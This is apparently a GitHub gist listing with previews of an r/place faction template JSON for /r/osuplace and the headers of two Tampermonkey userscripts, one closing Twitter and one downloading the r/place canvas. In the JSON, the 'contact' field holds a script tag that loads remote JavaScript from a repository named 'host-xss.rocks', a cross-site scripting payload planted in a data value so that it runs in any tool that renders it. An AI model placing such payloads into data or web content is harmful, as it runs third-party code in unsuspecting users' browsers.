This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"faction": "/r/osuplace", | |
"contact": "<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>", | |
"notifications": "http://127.0.0.1/", | |
"templates": [ | |
{ | |
"name": "bmc (the blurry face)", | |
"sources": [ | |
"https://i.imgur.com/ora8eX5.png", | |
"https://files.catbox.moe/6z4auc.png" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name Twitter brain preserving script | |
// @namespace http://tampermonkey.net/ | |
// @version 0.1 | |
// @description protect user | |
// @author Adryzz | |
// @match https://twitter.com/* | |
// @icon https://www.google.com/s2/favicons?sz=64&domain=twitter.com | |
// @grant window.close | |
// ==/UserScript== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name r/place canvas downloader | |
// @namespace http://tampermonkey.net/ | |
// @version 0.1 | |
// @description download the r/place canvas | |
// @author adryzz | |
// @match https://hot-potato.reddit.com/embed* | |
// @icon https://www.google.com/s2/favicons?sz=64&domain=reddit.com | |
// @grant none | |
// ==/UserScript== |